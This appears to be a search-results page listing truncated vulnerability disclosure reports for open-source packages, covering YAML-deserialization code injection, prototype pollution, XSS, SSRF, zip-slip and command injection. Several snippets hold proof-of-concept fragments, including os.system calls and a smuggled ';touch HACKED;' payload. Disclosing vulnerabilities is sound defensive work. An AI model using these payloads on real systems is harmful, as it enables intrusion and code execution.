4072 matches found
Code Injection in dimodimchev/access-control
Description Access-Control package is vulnerable to Arbitary Code Execution due to insecure yaml desearilization. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept steps to reproduce: python import os os.system'git clone...
Path Traversal in mucommander/mucommander
:book: Description mucommander A lightweight, cross-platform file manager with a dual-pane interface. This package is vulnerable for zip-slip. https://github.com/mucommander/mucommander https://www.mucommander.com/ :recycle: Steps To Reproduce-: 0 download and run latest release from...
Cross-site Scripting (XSS) - Generic in prasathmani/tinyfilemanager
:book: Description TinyFileManager is web based file manager and it is a simple, fast and small file manager with a single file, multi-language ready web application for storing, uploading, editing and managing files and folders online via web browser. The Application runs on PHP 5.5+, It allows...
Code Injection in ngockhanh5110/nlp-vietnamese-text-summarization
Description nlp-vietnamese-text-summarization package is vulnerable to Arbitary Code Execution due to insecure yaml desearilization. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept steps to reproduce: python import os...
Code Injection in xdf8/deepfriedbot
Description DeepFriedBot is a telegram bot that sends random deep fried memes, package is vulnerable to Arbitary Code Execution. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept python import os os.system'https://github.com/xdf8/DeepFriedBot'...
Server-Side Request Forgery (SSRF) in sebhildebrandt/systeminformation
Description systeminformation package is vulnerable to Server-side request forgery. It allows attackers to abuse of @ to make requests to a different domain or possibility to applications that are not publicly exposed through http://[email protected]:8080. Proof of Concept javascript cons...
Code Injection in adobe/himl
Description himl is a hierarchical config using yaml in Python, which is vulnerable to Arbitary Code Execution. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept Installation bash pip install himl Run exploit.py import os os.system'pip install himl...
Code Injection in adobe/ops-cli
Description ops-cli is a wrapper for Terraform, Ansible, Helmfile and SSH for cloud automation , which is vulnerable to Arbitary Code Execution. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept Installation bash pip install ops-cli Run exploit.py...
Cross-site Scripting (XSS) - Generic in ciur/papermerge-js
Description Papermerge is an open source document management system DMS primarily designed for archiving and retrieving your digital documents. Instead of having piles of paper documents all over your desk, office or drawers - you can quickly scan them and configure your scanner to directly uploa...
Prototype Pollution in trenskow/keyd
Description keyd is vulnerable to Prototype Pollution. This package fails to restrict access to prototypes of objects, allowing for modification of prototype behavior using a proto payload, which may result in Sensitive Information Disclosure/Denial of ServiceDoS/Remote Code Execution. Proof of...
Code Injection in unix121/i3wm-themer
Description i3wm-themer is the theme collection manager for i3-wm which is vulnerable to Arbitrary Code Execution. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept Installation bash git clone https://github.com/unix121/i3wm-themer cd i3wm-themer/...
Code Injection in heartexlabs/label-studio
Description Label Studio is a swiss army knife of data labeling and annotation tools which is vulnerable to Arbitrary Code Execution. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept Installation bash pip3 install label-studio Run exploit.py impor...
Prototype Pollution in elcharitas/js-dot
Description Prototype Pollution in js-dot Proof of Concept 1. Create the following PoC file: // poc.js var jsDot = require"js-dot" var obj = console.log"Before : " + .polluted; jsDot.setobj,"proto.polluted","Yes! Its Polluted"; console.log"After : " + .polluted; 2. Execute the following commands ...
Prototype Pollution in allain/propper
Description Prototype Pollution in propper Proof of Concept 1. Create the following PoC file: // poc.js var propper = require"propper" var obj = console.log"Before : " + .polluted; propperobj,"proto.polluted","Yes! Its Polluted"; console.log"After : " + .polluted; 2. Execute the following command...
Command Injection in sebhildebrandt/systeminformation
Description systeminformation is vulnerable to Command Injection vulnerability. It is possible to send an array containing OS commands, which bypass the filters. Proof of Concept 1. Create a Javascript file with the content below: javascript const si = require'systeminformation'; const command =...
Cross-site Scripting (XSS) - Generic in ciur/papermerge-js
:star2: Description - Papermerge is an open source document management system DMS primarily designed for archiving and retrieving your digital documents. Instead of having piles of paper documents all over your desk, office or drawers. In The Admin Upload Function. Users Are Able To Trigger...
Denial of Service in sebhildebrandt/systeminformation
Description systeminformation is vulnerable to Denial of Service. It is possible to overwrite the ping command parameters, which results in too long execution. Proof of Concept Create a .js file with the content below and run it. javascript const si = require'systeminformation'; si.inetLatency"-c...
Prototype Pollution in borderlesslabs/assign
Description @borderlesslabs/assign is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var a = require"@borderlesslabs/assign" const payload = JSON.parse'"proto":"polluted":"Yes! Its Polluted"'; var obj = console.log"Before : " + .polluted;...
Prototype Pollution in sttk/fav-prop.set-deep
Description @fav/prop.set-deep is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js var setDeep = require"@fav/prop.set-deep" var obj = ; console.log"Before: " + .polluted; setDeepobj, "proto", "polluted", "Yes, its polluted"...
Path Traversal in rust-compress/rc-zip
:book: Description rc-zip Pure rust zip & zip64 reading and writing. this package is vulnerable for zip-slip https://github.com/rust-compress/rc-zip https://crates.io/crates/rc-zip :recycle: Steps To Reproduce-: 0 download and run latest release from https://github.com/rust-compress/rc-zip 1 run ...
Cross-site Scripting (XSS) - Generic in ciur/papermerge
:book: Description Papermerge is an open source document management system DMS primarily designed for archiving and retrieving your digital documents. Instead of having piles of paper documents all over your desk, office or drawers - you can quickly scan them and configure your scanner to directl...
Cross-site Scripting (XSS) - Generic in rilyzhang/dy-server
Description Cross Site Scripting in dy-server2 Proof of Concept 1. Install package from npm: npm i -g dy-server2 2. Create folder or file with name: 3. Start server: dy-server2 -p 8888 4. Open website and the code will execute...
Command Injection in totaljs/framework
Description Command Injection in total.js Proof of Concept 1. Create the following PoC file: // poc.js const total = require'total.js'; let image = Image.load""; let payload = ";touch HACKED;"; image.pipenull,payload; 2. Execute the following commands in terminal: npm i total.js Install affected...
Prototype Pollution in kettek/dot-dotty
Description dot-dotty is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js const DotDotty = require'dot-dotty' let obj = a: 1 let dot = DotDottyobj console.log"Before : " + .polluted; dot'proto.polluted' = 'Yes! Its Polluted'; console.log"After : " +...
Code Injection in ewels/multiqc
Description MultiQC Aggregate results from bioinformatics analyses across many samples into a single report. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept Installation bash pip3 install multiqc Run exploit.py import os os.system'pip3 install...
Code Injection in nosarthur/gita
✍️ Description gita helps to Manage multiple git repos with sanity. Vulnerability description Vulnerable to YAML deserialization attack caused by unsafe loading. 🕵️♂️ Proof of Concept vulnerable part of code yaml.load in getcmdsfromfiles...
Code Injection in tensorspeech/tensorflowtts
✍️ Description TensorFlowTTS provides real-time state-of-the-art speech synthesis architectures such as Tacotron-2, Melgan, Multiband-Melgan, FastSpeech, FastSpeech2 based-on TensorFlow 2. With Tensorflow 2, we can speed-up training/inference progress, optimizer further by using fake-quantize awar...
Prototype Pollution in tandrewnichols/safe-obj
Description safe-obj is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js var safeObj = require"safe-obj" var obj = ; console.log"Before: " + .polluted safeObj.expandobj, "proto.polluted", true console.log"After: " + .polluted 2. Execute th...
Prototype Pollution in geta/nestedobjectassign
Description nested-object-assign is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const assign = require'nested-object-assign' console.log'Before: ' + .polluted assign, JSON.parse'"proto": "polluted": true' console.log'After: ' +...
Prototype Pollution in fabiospampinato/plain-object-merge
Description plain-object-merge is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const merge = require'plain-object-merge' console.log'Before: ' + .polluted merge, JSON.parse'"proto": "polluted": true' console.log'After: ' + .polluted 2...
Code Injection in tensorflow/tfx
Description TensorFlow Extended TFX is a Google-production-scale machine learning platform based on TensorFlow. It provides a configuration framework to express ML pipelines consisting of TFX components. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of...
Server-Side Request Forgery (SSRF) in sterlp/svg2png
:book: Description Svg2Png Manage your Icons in SVG and generate the needed PNG into your projects as needed. No "Web Service" needed, just an executable JAR file. this package is vulnerable to XXE. https://github.com/sterlp/svg2png :recycle: Steps To Reproduce-: 0 download and run latest release...
Prototype Pollution in fedeghe/objwun
Description objwun is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const set = require'objwun' console.log'Before: ' + .polluted set, 'proto.polluted', true console.log'After: ' + .polluted 2. Execute the following commands in the...
Prototype Pollution in grpc/grpc-node
Description grpc native core package is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var grpc =require'grpc'...
Prototype Pollution in a-maged/object-breacher
Description object-breacher is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const set = require'object-breacher' console.log'Before: ' + .polluted set, 'proto.polluted', true console.log'After: '+ .polluted 2. Execute the following...
Prototype Pollution in thi-ng/umbrella
Description @thi.ng/paths is vulnerable to Prototype Pollution. The vulnerability is due to an incomplete fix. mutIn function does not have fix implemented. Proof of Concept 1. Create the following PoC file: javascript // poc.js const paths = require'@thi.ng/paths' console.log"Before: ", .pollute...
Prototype Pollution in alexandervu/dot-prop-opt
Description dot-prop-opt is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const set = require'dot-prop-opt' console.log'Before: ' + .polluted set, 'proto.polluted', true console.log'After: ' + .polluted 2. Execute the following commands...
Prototype Pollution in yomguithereal/baobab
Description baobab is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const Baobab = require'baobab'; console.log'Before: ' + .polluted tree = new Baobab tree.deepMergeJSON.parse'"proto": "polluted": true' console.log'After: ' + .polluted...
Prototype Pollution in cronvel/tree-kit
Description tree-kit is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const dotPath = require'tree-kit' console.log"Before: ", .polluted dotPath.set, 'proto.polluted', true console.log"After: ", .polluted 2. Execute the following comman...
Cross-site Scripting (XSS) - Generic in frappe/charts
Description frappe-charts is vulnerable to Cross-Site Scripting XSS due to an incomplete fix https://github.com/frappe/charts/commit/d5706a501b44fce6949216b635ed6c5e785c471d. Steps To Reproduce 1. Open the following codesandbox...
Code Injection in tensorlayer/tensorlayer
Description TensorLayer is a novel TensorFlow-based deep learning and reinforcement learning library designed for researchers and engineers. It provides an extensive collection of customizable neural layers to build advanced AI models quickly. This package is vulnerable to Arbitrary Code Executio...
Prototype Pollution in js-data/js-data
Description js-data is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js const js = require"js-data"; const payload = JSON.parse'"proto":"polluted":"Yes! Its Polluted"'; var obj = console.log"Before : " + .polluted; js.utils.deepMixInobj, payload;...
Prototype Pollution in indlekofer/object_set
Description Prototype Pollution in @indlekofer/objectset Proof of Concept 1. Create the following PoC file: // poc.js var objectSet = require"@indlekofer/objectset" var obj = console.log"Before : " + .polluted; objectSet.defaultobj,"proto","polluted","Yes! Its Polluted"; console.log"After : " +...
Prototype Pollution in danieldelcore/object-deep-key
Description object-deep-key is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const objDeepKey = require'object-deep-key'.default console.log'Before: ', .toString objDeepKeyconstructor.prototype, 'toString'.set'function prototype pollute...
Prototype Pollution in dominictarr/libnested
Description libnested is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var libnested = require"libnested" var obj = console.log"Before : " + .polluted; libnested.setobj, 'proto','polluted', 'Yes! Its Polluted'; console.log"After : " + .polluted; 2...
Prototype Pollution in xiaoyifan6/json-glat
Description json-glat is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var jsonGlat = require"json-glat" console.log"Before : " + .polluted; jsonGlat.parse'proto.polluted': 'Yes! Its Polluted'; console.log"After : " + .polluted; 2. Execute the...
Prototype Pollution in lukeed/dset
Description dset is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var dset = require"dset" var obj = console.log"Before : " + .polluted; dsetobj, 'proto.polluted', 'Yes! Its Polluted'; console.log"After : " + .polluted; 2. Execute the following...
Prototype Pollution in babak-gholamzadeh/deeply-object-assign
Description deeply-object-assign is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var deeplyObjectAssign = require"deeply-object-assign" const payload = JSON.parse'"proto":"polluted":"Yes! Its Polluted"'; var obj = console.log"Before : " +...
Prototype Pollution in quernest/arr-flatten-unflatten
Description arr-flatten-unflatten is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var arrFlattenUnflatten = require"arr-flatten-unflatten" console.log"Before : " + .polluted; arrFlattenUnflatten.unflatten'protopolluted': 'Yes! Its Polluted';...
Prototype Pollution in allgay/jsonuri
Description jsonuri is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js const set = require'jsonuri' var obj = console.log"Before : " + .polluted; set, 'proto/polluted', 'Yes! Its Polluted'; console.log"After : " + .polluted; 2. Execute the following...